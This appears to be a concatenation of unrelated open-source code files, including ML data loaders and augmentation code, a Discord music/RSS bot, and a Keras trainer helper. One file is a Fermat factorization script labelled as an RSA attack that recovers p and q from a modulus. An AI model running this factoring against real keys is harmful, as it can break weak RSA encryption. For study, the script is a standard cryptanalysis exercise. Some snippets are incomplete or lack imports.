if self._mosaic_crop_mode is not None:
image, boxes, classes, is_crowd, area, _ = self._mosaic_crop_image(
image, boxes, classes, is_crowd, area)
sample = one
height, width = preprocessing_ops.get_image_shape(image)
sample['image'] = tf.cast(image, tf.uint8)
sample['groundtruth_boxes'] = boxes
sample['groundtruth_area'] = area
sample['groundtruth_classes'] = tf.cast(classes,
sample['groundtruth_classes'].dtype)
sample['groundtruth_is_crowd'] = tf.cast(is_crowd, tf.bool)
sample['width'] = tf.cast(width, sample['width'].dtype)
sample['height'] = tf.cast(height, sample['height'].dtype)
sample['num_detections'] = tf.shape(sample['groundtruth_boxes'])[1]
sample['is_mosaic'] = tf.cast(1.0, tf.bool)
del sample['shiftx']
del sample['shifty']
del sample['crop_points']
return sample
def _mosaic(self, one, two, three, four):
"""Stitch together 4 images to build a mosaic."""
if self._mosaic_frequency >= 1.0:
domo = 1.0
else:
domo = preprocessing_ops.random_uniform_strong(
0.0, 1.0, dtype=tf.float32, seed=self._seed)
noop = one.copy()
if domo >= (1 - self._mosaic_frequency):
cut, ishape = self._generate_cut()
one = self._process_image(one, 1.0, 1.0, cut, ishape)
two = self._process_image(two, 0.0, 1.0, cut, ishape)
three = self._process_image(three, 1.0, 0.0, cut, ishape)
four = self._process_image(four, 0.0, 0.0, cut, ishape)
patch1 = self._patch2(one, two)
patch2 = self._patch2(three, four)
stitched = self._patch(patch1, patch2)
return stitched
else:
return self._add_param(noop)
def _beta(self, alpha, beta):
"""Generates a random number using the beta distribution."""
a = tf.random.gamma([], alpha)
b = tf.random.gamma([], beta)
return b / (a + b)
def _mixup(self, one, two):
"""Blend together 2 images for the mixup data augmentation."""
if self._mixup_frequency >= 1.0:
domo = 1.0
else:
domo = preprocessing_ops.random_uniform_strong(
0.0, 1.0, dtype=tf.float32, seed=self._seed)
noop = one.copy()
if domo >= (1 - self._mixup_frequency):
sample = one
otype = one['image'].dtype
r = self._beta(8.0, 8.0)
sample['image'] = (
r * tf.cast(one['image'], tf.float32) +
(1 - r) * tf.cast(two['image'], tf.float32))
sample['image'] = tf.cast(sample['image'], otype)
sample['groundtruth_boxes'] = tf.concat(
[one['groundtruth_boxes'], two['groundtruth_boxes']], axis=0)
sample['groundtruth_classes'] = tf.concat(
[one['groundtruth_classes'], two['groundtruth_classes']], axis=0)
sample['groundtruth_is_crowd'] = tf.concat(
[one['groundtruth_is_crowd'], two['groundtruth_is_crowd']], axis=0)
sample['groundtruth_area'] = tf.concat(
[one['groundtruth_area'], two['groundtruth_area']], axis=0)
return sample
else:
return self._add_param(noop)
def _add_param(self, sample):
"""Add parameters to handle skipped images."""
sample['is_mosaic'] = tf.cast(0.0, tf.bool)
sample['num_detections'] = tf.shape(sample['groundtruth_boxes'])[0]
return sample
def _apply(self, dataset):
"""Apply mosaic to an input dataset."""
determ = self._deterministic
dataset = dataset.prefetch(tf.data.AUTOTUNE)
one = dataset.shuffle(100, seed=self._seed, reshuffle_each_iteration=True)
two = dataset.shuffle(
100, seed=self._seed + 1, reshuffle_each_iteration=True)
three = dataset.shuffle(
100, seed=self._seed + 2, reshuffle_each_iteration=True)
four = dataset.shuffle(
100, seed=self._seed + 3, reshuffle_each_iteration=True)
dataset = tf.data.Dataset.zip((one, two, three, four))
dataset = dataset.map(
self._mosaic, num_parallel_calls=tf.data.AUTOTUNE, deterministic=determ)
if self._mixup_frequency > 0:
one = dataset.shuffle(
100, seed=self._seed + 4, reshuffle_each_iteration=True)
two = dataset.shuffle(
100, seed=self._seed + 5, reshuffle_each_iteration=True)
dataset = tf.data.Dataset.zip((one, two))
dataset = dataset.map(
self._mixup,
num_parallel_calls=tf.data.AUTOTUNE,
deterministic=determ)
return dataset
def _skip(self, dataset):
"""Skip samples in a dataset."""
determ = self._deterministic
return dataset.map(
self._add_param,
num_parallel_calls=tf.data.AUTOTUNE,
deterministic=determ)
def mosaic_fn(self, is_training=True):
"""Determine which function to apply based on whether model is training."""
if is_training and self._mosaic_frequency > 0.0:
return self._apply
else:
return self._skip
``` |
{
"source": "63445538/Contrib",
"score": 2
} |
#### File: Contrib/pf-net/shapenet_part_loader.py
```python
import paddle.fluid as fluid
import os
import os.path
import json
import numpy as np
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
dataset_path = os.path.abspath(
os.path.join(BASE_DIR, 'dataset/shapenet_part/shapenetcore_partanno_segmentation_benchmark_v0/'))
class PartDataset(object):
def __init__(self, root=dataset_path, num_point=2500, classification=True, class_choice=None, mode='train',
normalize=True):
self.num_point = num_point
self.root = root
self.mode = mode
self.catfile = os.path.join(self.root, 'synsetoffset2category.txt')
self.cat = {}
self.classification = classification
self.normalize = normalize
with open(self.catfile, 'r') as f:
for line in f:
ls = line.strip().split()
self.cat[ls[0]] = ls[1]
# print(self.cat)
if not class_choice is None:
self.cat = {k: v for k, v in self.cat.items() if k in class_choice}
print(self.cat)
self.meta = {}
with open(os.path.join(self.root, 'train_test_split', 'shuffled_train_file_list.json'), 'r') as f:
train_ids = set([str(d.split('/')[2]) for d in json.load(f)])
with open(os.path.join(self.root, 'train_test_split', 'shuffled_val_file_list.json'), 'r') as f:
val_ids = set([str(d.split('/')[2]) for d in json.load(f)])
with open(os.path.join(self.root, 'train_test_split', 'shuffled_test_file_list.json'), 'r') as f:
test_ids = set([str(d.split('/')[2]) for d in json.load(f)])
for item in self.cat:
# print('category', item)
self.meta[item] = []
dir_point = os.path.join(self.root, self.cat[item], 'points')
dir_seg = os.path.join(self.root, self.cat[item], 'points_label')
# print(dir_point, dir_seg)
fns = sorted(os.listdir(dir_point))
if self.mode == 'trainval':
fns = [fn for fn in fns if ((fn[0:-4] in train_ids) or (fn[0:-4] in val_ids))]
elif self.mode == 'train':
fns = [fn for fn in fns if fn[0:-4] in train_ids]
elif self.mode == 'val':
fns = [fn for fn in fns if fn[0:-4] in val_ids]
elif self.mode == 'test':
fns = [fn for fn in fns if fn[0:-4] in test_ids]
else:
print('Unknown split: %s. Exiting..' % self.mode)
sys.exit(-1)
for fn in fns:
token = (os.path.splitext(os.path.basename(fn))[0])
self.meta[item].append((os.path.join(dir_point, token + '.pts'), os.path.join(dir_seg, token + '.seg'),
self.cat[item], token))
self.datapath = []
for item in self.cat:
for fn in self.meta[item]:
self.datapath.append((item, fn[0], fn[1], fn[2], fn[3]))
self.classes = dict(zip(sorted(self.cat), range(len(self.cat))))
print(self.classes)
self.num_seg_classes = 0
if not self.classification:
for i in range(len(self.datapath) // 50):
l = len(np.unique(np.loadtxt(self.datapath[i][2]).astype(np.uint8)))
if l > self.num_seg_classes:
self.num_seg_classes = l
# print(self.num_seg_classes)
def get_random_sample(self, index):
fn = self.datapath[index]
cls = self.classes[self.datapath[index][0]]
# cls = np.array([cls]).astype(np.int32)
point_set = np.loadtxt(fn[1]).astype(np.float32)
if self.normalize:
point_set = self.pc_normalize(point_set)
seg = np.loadtxt(fn[2]).astype(np.int64) - 1
foldername = fn[3]
filename = fn[4]
# print(point_set.shape, seg.shape)
choice = np.random.choice(len(seg), self.num_point, replace=True)
# resample
point_set = point_set[choice, :]
seg = seg[choice]
# To Pytorch
# point_set = torch.from_numpy(point_set)
# seg = torch.from_numpy(seg)
# cls = torch.from_numpy(np.array([cls]).astype(np.int64))
# To PaddlePaddle
if self.classification:
return point_set, cls
else:
return point_set, seg, cls
def __len__(self):
return len(self.datapath)
def pc_normalize(self, pc):
""" pc: NxC, return NxC """
l = pc.shape[0]
centroid = np.mean(pc, axis=0)
pc = pc - centroid
m = np.max(np.sqrt(np.sum(pc ** 2, axis=1)))
pc = pc / m
return pc
def get_reader(self, batch_size):
batch_num = int(len(self.datapath)/batch_size)
def __reader__():
for _ in range(batch_num):
sample_list = []
for _ in range(batch_size):
choice = np.random.choice(len(self.datapath))
point, label = self.get_random_sample(choice)
sample_list.append([point, label])
yield sample_list
return __reader__
if __name__ == '__main__':
dset = PartDataset(
root='/home/arclab/PF-Net-Point-Fractal-Network/dataset/shapenet_part/shapenetcore_partanno_segmentation_benchmark_v0/',
classification=True, class_choice=None, num_point=2048, mode='train')
place = fluid.CUDAPlace(0) # 或者 fluid.CUDAPlace(0)
fluid.enable_imperative(place)
train_loader = fluid.io.DataLoader.from_generator(capacity=10)
train_loader.set_sample_list_generator(dset.get_reader(32), places=place)
for data in train_loader():
points, label = data
batch_size = points.shape[0]
print(label)
# print(ps.size(), ps.type(), cls.size(), cls.type())
# print(ps)
# ps = ps.numpy()
# np.savetxt('ps'+'.txt', ps, fmt = "%f %f %f")
``` |
{
"source": "636F57/CryptoAttackers",
"score": 3
} |
#### File: CryptoAttackers/RSA-Factorization/FermatsFactor.py
```python
from decimal import *
import time
import sys
bFileOutput = True
def fermatsFactorBasic(N):
NN = Decimal(N)
A = NN.sqrt()
A = A.to_integral_value(rounding=ROUND_CEILING)
b2 = A * A - NN
Amax = Decimal(0.5) * NN + 1
try:
tmp = b2.sqrt()
while tmp != tmp.to_integral_value():
A += 1 # search upward to find A such that A = (p+q)/2
if A > Amax:
print("Could not factor N.")
sys.exit()
b2 = A * A - NN
tmp = b2.sqrt()
except KeyboardInterrupt:
print("Interrupted. A=",A)
sys.exit()
p = A + tmp # tmp = abs((p-q)/2)
q = A - tmp
return int(p), int(q)
if __name__ == "__main__":
getcontext().prec = 4096
N = Decimal(input("Enter N as base-10 integer:"))
if N < 0 or N % Decimal(2) == 0:
print("N must be a positive odd integer.")
sys.exit()
t_start = time.time()
p, q = fermatsFactorBasic(N)
t_taken = time.time()-t_start
if bFileOutput:
with open("factor_out.txt", "w") as f:
strOut = "N = " + str(N) + "\n"
f.write(strOut)
print(strOut)
strOut = "p = " + str(p) + "\n"
f.write(strOut)
print(strOut)
strOut = "q = " + str(q) + "\n"
f.write(strOut)
print(strOut)
strOut = "calc time =" + str(t_taken // 60) + " min " + str(t_taken % 60) + " sec" + "\n"
f.write(strOut)
print(strOut)
else:
print( "N =", N)
print( "p =", p)
print( "q =", q)
print( "calc time =", t_taken // 60, " min", t_taken % 60, "sec")
print("done")
``` |
{
"source": "636F57/discordbots",
"score": 2
} |
#### File: 636F57/discordbots/cactusbot.py
```python
import discord
from discord.ext import commands
import random
import glob
from os.path import basename
import time
import aiohttp
from bs4 import BeautifulSoup
import asyncio
import html
import calendar
from cactusconsts import CactusConsts
import traceback
if not discord.opus.is_loaded(): #this is necessary for voice activities
discord.opus.load_opus('libopus-0.dll')
print("opus dll is loaded = ", discord.opus.is_loaded())
description = '''Utility Bot custom-made for this server. :cactus:'''
bot = commands.Bot(command_prefix='#', description=description)
#global variants for music
g_listEcho = []
Mee6_ID = CactusConsts.Mee6_ID
fredboadPrefix = ";;play "
marshmallowPrefix = ":request "
#global variants for RSS
g_RSSdictkey = ["index", "url", "lastModified", "eTag", "lastcheck", "channel_ID", "userID"]
filenameRSS = "RSSdata" #RSSdata format: "index","url","lastModified","eTag","lastcheck","channel_ID","userID"\n for each entry
g_session = aiohttp.ClientSession()
g_intervalhours = 2 # RSS check interval in hours
@bot.event
async def on_ready():
print('Logged in as')
print(bot.user.name)
print(bot.user.id)
print('------')
#### For music utility ####
@bot.event
async def on_message(message):
print("on message : ", message.author.name, message.author.id)
global g_listEcho
if (message.author.id == Mee6_ID):
print("message by Mee6")
if len(g_listEcho) > 0:
#print(message.content)
if CactusConsts.Mee6_notfound_msg in message.content:
print("canceling 1 echo")
g_listEcho.pop(0)
elif 'youtu' in message.content:
print("in echo")
await bot.send_message(message.channel, g_listEcho[0] + message.content)
g_listEcho.pop(0)
if (len(g_listEcho) > 0 ) and (g_listEcho[0] == marshmallowPrefix):
await asyncio.sleep(10) # since requests to marshmallow must have 10sec intervals
else:
await bot.process_commands(message)
@bot.command()
async def songfiles():
"""List the available songlist category options."""
strList = ""
fileList = glob.glob("./Songs/*.txt")
if len(fileList) == 0:
strList = "No file found."
else:
for file in fileList:
strList += basename(file) + " "
await bot.say(strList)
@bot.command()
async def feeda(number : int, category='favorite'):
"""Feed number of songs to Aethex, randomly selecting from the txt file."""
if number > 5:
await bot.say("Maximun queue is limited to 5 songs.")
number = 5
print("category = ", category)
strFile = "./Songs/" + category + ".txt"
with open(strFile, "rt") as f:
listSongs = f.readlines()
print("list length = ", len(listSongs))
for i in range(number):
strCommand = "-play " + listSongs[random.randint(0, len(listSongs)-1)] + "\n"
await bot.say(strCommand)
@bot.command()
async def feedf(number : int, category='favorite'):
"""Feed number of songs to FredBoat, randomly selecting from the txt file."""
global g_listEcho
if number > 5:
await bot.say("Maximun queue is limited to 5 songs.")
number = 5
print("category = ", category)
strFile = "./Songs/" + category + ".txt"
with open(strFile, "rt") as f:
listSongs = f.readlines()
print("list length = ", len(listSongs))
for i in range(number):
strCommand = "!youtube " + listSongs[random.randint(0, len(listSongs)-1)] + "\n"
await bot.say(strCommand)
g_listEcho.append(fredboadPrefix)
@bot.command()
async def feedm(number : int, category='favorite'):
"""Feed number of songs to Marshmallow, randomly selecting from the txt file."""
global g_listEcho
if number > 5:
await bot.say("Maximun queue is limited to 5 songs.")
number = 5
print("category = ", category)
strFile = "./Songs/" + category + ".txt"
with open(strFile, "rt") as f:
listSongs = f.readlines()
print("list length = ", len(listSongs))
for i in range(number):
strCommand = "!youtube " + listSongs[random.randint(0, len(listSongs)-1)] + "\n"
await bot.say(strCommand)
g_listEcho.append(marshmallowPrefix)
time. sleep(11) # since requests to marshmallow must have 10sec intervals
@bot.command()
async def feedf_url(number : int):
"""Feed number of URLs to FredBoat, randomly selecting from the FavoriteURLs file."""
if number > 5:
await bot.say("Maximun queue is limited to 5 songs.")
number = 5
strFile = "./Songs/FavoriteURLs"
with open(strFile, "rt") as f:
listURLs = f.readlines()
print("list length = ", len(listURLs))
for i in range(number):
strCommand = fredboadPrefix + listURLs[random.randint(0, len(listURLs)-1)] + "\n"
await bot.say(strCommand)
@bot.command()
async def feedm_url(number : int):
"""Feed number of URLs to Marshmallow, randomly selecting from the FavoriteURLs file."""
if number > 5:
await bot.say("Maximun queue is limited to 5 songs.")
number = 5
strFile = "./Songs/FavoriteURLs"
with open(strFile, "rt") as f:
listURLs = f.readlines()
print("list length = ", len(listURLs))
for i in range(number):
strCommand = marshmallowPrefix + listURLs[random.randint(0, len(listURLs)-1)] + "\n"
await bot.say(strCommand)
time. sleep(11) # since requests to marshmallow must have 10sec intervals
@bot.command()
async def feedf_url_playlist():
"""Feed one of playlist url to FredBoat, randomly selecting from the FavoritePlaylists file."""
strFile = "./Songs/FavoritePlaylists"
with open(strFile, "rt") as f:
listURLs = f.readlines()
print("list length = ", len(listURLs))
strCommand = fredboadPrefix + listURLs[random.randint(0, len(listURLs)-1)] + "\n"
await bot.say(strCommand)
@bot.command()
async def feedm_url_playlist():
"""Feed one of playlist url to Marshmallow, randomly selecting from the FavoritePlaylists file."""
strFile = "./Songs/FavoritePlaylists"
with open(strFile, "rt") as f:
listURLs = f.readlines()
print("list length = ", len(listURLs))
strCommand = marshmallowPrefix + listURLs[random.randint(0, len(listURLs)-1)] + "\n"
await bot.say(strCommand)
@bot.command()
async def favor(song):
"""Add the song to Favorite.txt file."""
if song == "":
await bot.say("You must specify the song to add.")
with open("./Songs/Favorite.txt", "a+") as f:
f.write(song + "\n")
await bot.say(song + " is added. :cactus:")
@bot.command()
async def favor_url(url):
"""Add the URL to FavoriteURLs file."""
if url == "":
await bot.say("You must specify the URL to add.")
with open("./Songs/FavoriteURLs", "a+") as f:
f.write(url + "\n")
await bot.say(url + " is added. :cactus:")
@bot.command()
async def favor_url_playlist(url):
"""Add the playlist URL to FavoritePlaylists file."""
if url == "":
await bot.say("You must specify the URL to add.")
with open("./Songs/FavoritePlaylists", "a+") as f:
f.write(url + "\n")
await bot.say(url + " is added. :cactus:")
@bot.command(pass_context=True)
async def join(ctx):
"""Let CactusBot to join the voice channel."""
print(ctx.message.author)
voiceclient = bot.voice_client_in(ctx.message.server)
print(ctx.message.server)
if voiceclient == None:
print(ctx.message.author.voice.voice_channel)
await bot.join_voice_channel(ctx.message.author.voice.voice_channel)
elif voiceclient.channel != ctx.message.channel:
await voiceclient.move_to(ctx.message.channel)
@bot.command()
async def ytm(text):
"""Feed search result to Marshmallow."""
global g_listEcho
await bot.say("!youtube " + text)
g_listEcho.append(marshmallowPrefix)
@bot.command()
async def ytf(text):
"""Feed search result to FredBoat."""
global g_listEcho
await bot.say("!youtube " + text)
g_listEcho.append(fredboadPrefix)
#############################
#### For RSS utility #####
# return the channel ID of the given name in the server
# return "" when not found
def get_channel_ID(bot, server_ID, channel_name):
if channel_name == "":
return ""
for channel in bot.get_server(server_ID).channels:
if channel.name == channel_name:
return channel.id
return ""
def read_rssfile():
global g_RSSdictkey
listRSSdict = []
with open(filenameRSS, "rt") as f:
for line in f:
if len(line) > 1:
line = line.lower()
listRSSdict.append(dict(zip(g_RSSdictkey, line.strip().split(','))))
return listRSSdict
def max_index_of_rssfile():
max_index = 0
listRSSdict = read_rssfile()
if len(listRSSdict) > 0:
max_index = listRSSdict[len(listRSSdict)-1]["index"] #assume the last entry always has the max index
return max_index
def write_rssfile(listRSSdict):
global g_RSSdictkey
with open(filenameRSS, "wt") as f:
for rss in listRSSdict:
line = ""
for key in g_RSSdictkey:
line += str(rss[key]) + ","
f.write(line[:-1]+"\n")
print("successfully wrote listRSSdict to the file.")
return
@bot.command(pass_context=True)
async def rss_add_reddit(ctx):
"""Specify the subreddit name and channel name. Add the subreddit to RSS check-list."""
command,sub,channel_name = ctx.message.content.split(' ')
line = str(int(max_index_of_rssfile())+1)+",https://www.reddit.com/r/"+ sub +"/.rss,,,"+str(int(time.time()))
channelID = get_channel_ID(bot, ctx.message.server.id, channel_name)
print("CACTUS ROOMS SERVER ID:",ctx.message.server.id)
if channelID == "":
channelID = ctx.message.channel.id
line += ","+ channelID + "," + ctx.message.author.id + "\n"
with open(filenameRSS, "a+") as f:
f.write(line)
await bot.say(":cactus:"+sub+" was added to RSS list.:cactus:")
@bot.command(pass_context=True)
async def rss_add_github(ctx):
"""Specify github repo URL and channel name. Add the repo to RSS check-list."""
command,url,channel_name = ctx.message.content.split(' ')
if not 'github' in url:
await bot.say("It is not GitHub URL.")
return
with open(filenameRSS, "a+") as f:
if url[len(url)-1] != '/':
url += '/'
line = str(int(max_index_of_rssfile())+1)+","+url+"commits/master.atom,,,"+str(int(time.time()))
channelID = get_channel_ID(bot, ctx.message.server.id, channel_name)
if channelID == "":
channelID = ctx.message.channel.id
line += ","+ channelID + "," + ctx.message.author.id + "\n"
f.write(line)
await bot.say(":cactus:"+url+" was added to RSS list.:cactus:")
@bot.command(pass_context=True)
async def rss_list(ctx):
"""List all the RSS URLs requested by you."""
bAll = False
# only server owner can see all the URLs in the list
if ctx.message.author.id == ctx.message.server.owner.id:
bAll = True
listRSSdict = read_rssfile()
if len(listRSSdict) == 0:
await bot.say("There is no URL in the list.")
for rss in listRSSdict:
if bAll or ctx.message.author.id == rss["userID"]:
channel_name = bot.get_channel(rss["channel_ID"]).name
await bot.say(rss["index"]+" : " + rss["url"] +" to #" + channel_name) #list index, URL, and channel to cat
@bot.command()
async def rss_del(index):
"""Delete the specified index entry from RSS check-list."""
listRSSdict = read_rssfile()
output = []
for rss in listRSSdict:
if rss["index"] != index:
output.append(rss)
write_rssfile(output)
if len(output) < len(listRSSdict):
await bot.say(index+" was deleted.")
else:
await bot.say(index+" was not found in the list.")
# function that is called as a task to fetch and report RSS updates
async def checkRSS(bot):
global g_RSSdictkey
global g_session
try:
while not bot.is_closed:
print("now in checkRSS.")
while bot.is_logged_in:
print("now start checking RSS updates...")
listRSSdict = read_rssfile()
if len(listRSSdict) == 0:
print("no RSS urls found.")
else:
header = {'User-Agent':CactusConsts.UserAgentName}
for rss in listRSSdict:
rss_backup = rss
try:
print("checking RSS of ", rss["url"])
if len(rss["lastModified"]) > 0:
header['If-Modified-Since'] = rss["lastModified"] #Last-Modified
if len(rss["eTag"]) > 0:
header['If-None-Match'] = rss["eTag"] #ETAG
response = await g_session.get(rss["url"], headers = header)
print("response status=",response.status)
if response.status == 304:
print("no update for ", rss["url"])
elif response.status == 200:
#print(response.headers)
if 'LAST-MODIFIED' in response.headers:
rss["lastModified"] = response.headers['LAST-MODIFIED']
else:
rss["lastModified"] = ""
if 'ETAG' in response.headers:
rss["eTag"] = response.headers['ETAG']
else:
rss["eTag"] = ""
body = await response.read()
soup = BeautifulSoup(body)
entries = soup.find_all('entry')
if 'reddit' in rss["url"]:
await process_reddit(bot, entries, rss["lastcheck"], bot.get_channel(rss["channel_ID"]))
elif 'github' in rss["url"]:
await process_github(bot, entries, rss["lastcheck"], bot.get_channel(rss["channel_ID"]))
else:
await bot.say("Failed to get RSS feed from the server. " + rss["url"])
response.close()
rss["lastcheck"] = int(time.time())
except:
rss = rss_backup
print("error in checkRSS:",rss["url"])
print(traceback.format_exc())
write_rssfile(listRSSdict)
await asyncio.sleep(g_intervalhours*3600)
await asyncio.sleep(30) #wait 30 seconds then retry
except asyncio.CancelledError:
print("checkRSS task is cancelled by program")
except Exception as e:
print("Error in checkRSS:", e.args)
# functions which actrually parse the HTML and make the bot say the results
async def process_reddit(bot, entries, lastcheck, channel):
for entry in entries:
if is_updated(entry.find('updated').text, lastcheck):
postcat = entry.find('category')
#print(postcat)
strSay = ":cactus:*New Post at " + postcat['term'] + ' (' + postcat['label'] + ')*:cactus:\n\n'
strSay += "**Title : " + entry.find('title').text + '**\n'
#print(entry.find('content').text)
postcontent = html.unescape(entry.find('content').text)
#print(postcontent)
postcontent = BeautifulSoup(postcontent)
urlcontent = postcontent.find_all('a')
#print(urlcontent)
for url in urlcontent:
if '[comments]' in url:
strSay += url['href'] + "\n"
break
#print(strSay)
await bot.send_message(channel, strSay)
async def process_github(bot, entries, lastcheck, channel):
for entry in entries:
#print(entry)
if is_updated(entry.find('updated').text, lastcheck) :
author = entry.find('author')
strSay = ":cactus:*New Commit at GitHub by " + author.find('name').text + '*:cactus:\n\n'
strSay += "**Comment : " + entry.find('title').text + '**\n'
strSay += entry.find('link')['href']
print(strSay)
await bot.send_message(channel, strSay)
# updatedtime should be in the format like: 2016-11-11T12:38:34+02:00(reddit) or 2016-11-11T12:38:34Z(github) #changed 8th.dec.2016
# lastcheck is the string which is stored in RSSfile
def is_updated(updatedtime, lastcheck):
print(updatedtime)
shiftsec = 0
if '+' in updatedtime:
times = updatedtime.split('+')
updatedtime = times[0]
shifttimes = times[1][:2]
shiftsec = int(shifttimes[0]) * 3600 + int(shifttimes[1]) * 60
elif 'Z' in updatedtime:
updatedtime = updatedtime[:-1]
sttime = time.strptime(updatedtime, "%Y-%m-%dT%H:%M:%S")
updated_insec = calendar.timegm(sttime) - shiftsec
print ("updated, since = ",updated_insec, lastcheck)
if updated_insec < int(lastcheck):
return False
else:
return True
#######################
##### Others #########
@bot.command()
async def test():
"""command for test and debug"""
await bot.say("RSS test started.")
await checkRSS(bot)
@bot.command(pass_context=True)
async def b(ctx):
"""command for Birthday Wish"""
command,name = ctx.message.content.split(' ')
await bot.say("Happy Birthday to **" + name + "**! :cactus: :tada:")
######################################
loop = asyncio.get_event_loop()
try:
loop.create_task(checkRSS(bot))
loop.run_until_complete(bot.start(CactusConsts.CactusBot_Token))
except KeyboardInterrupt:
print("KeyboardInterrupt")
except Exception as e:
print(e.args)
finally:
loop.run_until_complete(bot.logout())
# cancel all tasks lingering
tasks = asyncio.Task.all_tasks(loop)
for task in tasks:
task.cancel()
loop.close()
if g_session:
g_session.close()
``` |
{
"source": "636/keras_utility",
"score": 2
} |
#### File: keras_utility/keras_utility/trainer.py
```python
import logging
from typing import Callable, Generator, List, Union, Tuple
from keras import backend as K
from keras.models import Model
LOGGER = logging.getLogger(__name__)
# return: step, generator
DatasetLoader = Callable[[], Union[int, Generator]]
class KerasTrainer():
logger = LOGGER.getChild('KerasTrainer')
def __init__(self, worker=10, callbacks=[]):
self.worker = worker
self.callbacks = callbacks
def train(self,
model,
train_loader: DatasetLoader,
val_loader: DatasetLoader,
epochs: int,
callbacks=[]) -> Tuple[Model, dict]:
_train_step, _train_loader = train_loader()
self.logger.info('epoch: %s, train_step: %s',
epochs, _train_step)
model.summary(print_fn=self.logger.info)
_options = {
'verbose': 1,
'callbacks': self.callbacks + callbacks,
'workers': self.worker
}
if val_loader:
_val_step, _val_loader = val_loader()
self.logger.info('val_step: %s', _val_step)
_options.update({
'validation_data': _val_loader,
'validation_steps': _val_step,
})
self.logger.info('training start.')
history = model.fit_generator(_train_loader,
_train_step,
epochs,
**_options)
self.logger.info('training end.')
return model, history
@classmethod
def apply_multi_gpu_if_available(cls, model_builder: Callable, freeze: Callable = lambda x: x):
"""
# return
[is_multi: Bool, applyed multi gpu model, original model]
"""
gpu_count = len(
[x for x in [x.name for x in K.get_session().list_devices()] if 'gpu' in x.lower()])
cls.logger.info('available gpu count: %s', gpu_count)
is_multi = False
if gpu_count > 1:
cls.logger.info('apply multi gpu mode.')
with tf.device('/cpu:0'):
original_model = model_builder()
original_model = freeze(original_model)
model = multi_gpu_model(original_model)
is_multi = True
else:
cls.logger.info(
'not apply multi gpu. single gpu mode or cpu mode.')
original_model = model_builder()
original_model = freeze(original_model)
model = original_model
return is_multi, model, original_model
``` |
{
"source": "636/python3_invoker",
"score": 2
} |
#### File: python3_invoker/invoker/__init__.py
```python
import importlib
import logging
import logging.config
import os
import re
import sys
from collections.abc import Mapping
from logging import Logger
from pathlib import Path
from typing import Callable, Dict, List, Tuple
import yaml
from injector import Binder, Injector, Key, singleton
from invoker.utils import AliasDict, split_qualified_name
LOGGER = logging.getLogger(__name__)
InvokeConfig = Key('InvokeConfig') # type: AliasDict
InvokeOptions = Key('InvokeOptions') # type: Dict
class InvokerContext():
logger = LOGGER.getChild('InvokerContext') # type: Logger
IS_ALREADY_LOADED_LOGGING = False
@classmethod
def set_logging_config(cls, logging_config_file: Path):
if cls.IS_ALREADY_LOADED_LOGGING:
cls.logger.warning(
'already initilize logging configuration. skip.')
else:
cls.logger.info('initilize logging configuration. start')
with logging_config_file.open('r', encoding='utf-8') as f:
config = yaml.load(f)
logging.config.dictConfig(config)
cls.IS_ALREADY_LOADED_LOGGING = True
cls.logger.info(
'initilize logging configuration. end: \n%s', config)
def __init__(self, config_file_list: List[Path],
logging_config_path: Path = None):
if logging_config_path:
self.set_logging_config(logging_config_path)
# logging default setting.
config = AliasDict({})
for c_file in config_file_list:
cl = AliasDict.load_from_yaml(c_file)
config.update(cl)
self.app_config = config
self.injector = Injector(modules=[self._injector_bind]) # type: Injector
self.invoke_options = None
def _injector_bind(self, binder: Binder):
binder.bind(InvokeConfig, to=self.app_config, scope=singleton)
def invoke(self, invoke_options: Dict):
self.invoke_options = invoke_options
self.injector.binder.bind(InvokeOptions, to=self.invoke_options, scope=singleton)
_package, _callable = split_qualified_name(invoke_options['invoke'])
self.logger.debug('calleble: %s, package: %s', _callable, _package)
self.logger.debug('cwd: %s', os.getcwd())
sys.path.append(os.getcwd())
self.logger.debug('sys.path: \n %s', '\n '.join(sys.path))
_func = getattr(importlib.import_module(_package), _callable) # type: Callable
kwargs = invoke_options.get('args', {})
try:
return self._invoke(_func, args=[], kwargs=kwargs)
except Exception as e:
self.logger.exception('invoke function internal error.')
sys.exit(10)
def _invoke(self, func: Callable, args: Tuple, kwargs: Dict) -> any:
self.logger.info('func: %s args: %s, kwargs: %s', func, args, kwargs)
return self.injector.call_with_injection(func,
args=args,
kwargs=kwargs)
```
#### File: python3_invoker/sample/sample.py
```python
import logging
from injector import inject
from invoker import InvokeConfig
LOGGER = logging.getLogger(__name__)
@inject
def sample_function(config: InvokeConfig,
key: str):
LOGGER.info('key: %s, value: %s', key, config.get(key))
LOGGER.info('config: %s', config)
``` |
{
"source": "6390wer/captionify",
"score": 3
} |
#### File: captionify/streamlit/ui.py
```python
import streamlit as st
from requests_toolbelt.multipart.encoder import MultipartEncoder
import requests
from PIL import Image
import io
st.title('Caption Generator')
# fastapi endpoint
url = 'http://fastapi:8000'
endpoint = '/caption'
st.write('''Generate brief caption of the selected image.
This streamlit example uses a FastAPI service as backend.
Visit this URL at `:8000/docs` for FastAPI documentation.''') # description and instructions
image = st.file_uploader('insert image') # image upload widget
def process(image, server_url: str):
m = MultipartEncoder(
fields={'file': ('filename', image, 'image/jpeg')}
)
r = requests.post(server_url,data=m,headers={'Content-Type': m.content_type},
timeout=800000)
return r
if st.button('Get caption'):
if image is None:
st.write("Insert an image!") # handle case with no image
else:
caption = process(image, url+endpoint)
print(caption)
st.image([image], width=300) # output dyptich
st.write(caption.content)
``` |
{
"source": "63days/augmix",
"score": 2
} |
#### File: 63days/augmix/augmix.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from augmentations import *
from torch.distributions.dirichlet import Dirichlet
from torch.distributions.beta import Beta
#dv = 'cuda' if torch.cuda.is_available() else 'cpu'
class AugMixDataset(torch.utils.data.Dataset):
def __init__(self, dataset, preprocess, no_jsd=False):
super(AugMixDataset, self).__init__()
self.dataset = dataset
self.preprocess = preprocess
self.no_jsd = no_jsd
self.aug = AugMix()
def __getitem__(self, i):
x, y = self.dataset[i]
if self.no_jsd:
return self.preprocess(x), y
else:
aug1 = self.aug.augment_and_mix(x, self.preprocess)
aug2 = self.aug.augment_and_mix(x, self.preprocess)
return (self.preprocess(x), aug1, aug2), y
def __len__(self):
return len(self.dataset)
class AugMix(nn.Module):
def __init__(self, k=3, alpha=1, severity=3):
super(AugMix, self).__init__()
self.k = k
self.alpha = alpha
self.severity = severity
self.dirichlet = Dirichlet(torch.full(torch.Size([k]), alpha, dtype=torch.float32))
self.beta = Beta(alpha, alpha)
self.augs = augmentations
self.kl = nn.KLDivLoss(reduction='batchmean')
def augment_and_mix(self, images, preprocess):
'''
Args:
images: PIL Image
